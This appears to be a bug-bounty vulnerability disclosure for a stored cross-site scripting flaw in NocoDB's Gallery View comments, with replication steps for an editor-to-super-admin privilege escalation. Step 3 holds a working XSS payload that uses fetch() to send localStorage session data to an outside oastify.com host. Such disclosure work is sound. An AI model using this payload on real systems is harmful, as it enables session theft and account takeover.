Stored Cross-Site Scripting in nocodb/nocodb
Jun 11th 2022
A stored cross-site scripting vulnerability exists within the Gallery View comments functionality.
Replication Steps and PoC
PC1. A project exists.
PC2. A table with a sheet containing data exists in the project.
PC3. A gallery view exists.
PC4. A user with the editor role exists.
Step 1: As an authenticated user with the editor role, navigate to the Gallery View for the existing table and sheet.
Step 2: In the new Gallery View, click on a card to edit the record.
Step 3: In a text field, supply the value containing the cross-site scripting payload, as follows:
"><img src onerror=fetch('http://dfw2bi08jn24w1j8ift9o1kd3490xp.oastify.com/'+localStorage.getItem('vuex'))>
Step 4: Click "Save row".
Step 5: In a new browser session, authenticate to NocoDB as the super admin.
Step 6: As the super admin, browse to the Gallery View, click the card from step two, and then click the icon to view the comments. The XSS is executed in the context of the super admin account.
Step 7: The local storage vuex data is sent to an attacker-controlled server, which can be base64 decoded to retrieve the session token.
The proof-of-concept video demonstrates a user with the editor role exploiting this vulnerability to gain super admin access.
A lower-privileged user (editor role) can achieve privilege escalation to super admin.